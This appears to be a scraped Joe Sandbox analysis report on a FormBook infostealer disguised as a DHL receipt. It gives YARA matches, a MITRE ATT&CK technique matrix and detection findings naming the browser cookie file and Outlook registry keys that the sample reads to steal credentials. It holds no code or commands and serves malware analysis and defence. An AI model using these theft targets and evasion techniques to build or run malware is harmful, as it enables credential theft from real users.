Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.4573592974.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575252245.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2351320245.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4577146791.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575297734.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2349664896.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4575057978.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2354807978.0000000003C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	612 Process Injection	1 Masquerading	1 OS Credential Dumping	321 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	13 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL AWB Receipt_pdf.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
DHL AWB Receipt_pdf.bat.exe